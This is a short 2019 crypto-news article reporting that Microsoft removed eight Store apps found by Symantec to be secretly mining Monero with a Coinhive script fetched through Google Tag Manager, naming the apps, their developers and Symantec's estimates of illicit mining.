Microsoft Pulls Down 8 Malicious Crypto-Mining Apps from Microsoft Store

Feb 17 2019

As the popularity of cryptocurrencies rises, so are cryptocurrency-related crimes. One of the most common such crimes is cryptojacking where a device mines for cryptocurrencies without the knowledge or the permission of the user. 8 such applications which were mining for cryptocurrencies using the processing power of the users’ computers were recently pulled down from the Microsoft Store.

These applications were first spotted by security firm Symantec. In a recent blog post posted after the removal of these apps, the company has explained what these apps were doing. Symantec found out about these applications on the Microsoft Store on the 17th of January. The company points out that all these Microsoft store applications were making use of the Coinhive script, which is among the most popular means to mine for cryptocurrencies in an illicit way. 

All of these applications were running on Windows 10 and Windows 10 S platforms. Windows 10 S users are heavily reliant on the Microsoft Store for downloading applications because the OS does not allow to install any third-party apps. Moreover, Symantec also notes in their report that all these applications were developed by three developers: DigiDreams, 1Clean and Findoo. 

These applications are - Fast-search Lite, Battery Optimizer (tutorials), VPN Browser+, Downloader for YouTube Videos, Clean Master+ (tutorials), FasTube, Findoo Browser 2019, Findoo Mobile and Desktop Search. These application deal with searching and browsing, as well as battery optimization and improving the web experience. 

How Do These Applications Work?

Symantec points out that the modus operandi of all these apps is very similar - thereby making it safe to assume that all these applications were developed by the same person or the same group of persons. The Symantec report notes:

“In total, we discovered eight apps from these developers that shared the same risky behaviour. After further investigation, we believe that all these apps were likely developed by the same person or group.”

The company also explained the functioning of these apps. Once a user downloads and opens any of these applications, the apps fetch a javascript library from the Google Tag Manager in their domain servers. These javascript libraries are actually where the Coinhive script is contained - which makes use of the processing power of the CPU of the user’s computer to mine for Monero (XMR) cryptocurrency. 

Apart from informing Microsoft, Symantec also notified Google that the malicious Coinhive javascript was running on the Google Tag Manager, which has since been removed by Google. Symantec notes that despite having a privacy policy for these applications, none of the policies mentioned that the apps will be mining for cryptocurrencies. 

Monero is among the most popular cryptocurrencies used by criminals for such crypto-crime. Reports point out that approximately 4.3% of total Monero in circulation has been mined using illicit means such as these. The company, in their report, states:

“Overall, we estimate there are at least 2,218 active campaigns that have accumulated about 720,000 XMR ($57 million).”

Stay tuned with us at Cryptoground for more news stories and updates from the world of cryptocurrencies and the blockchain technology! 
 

Comments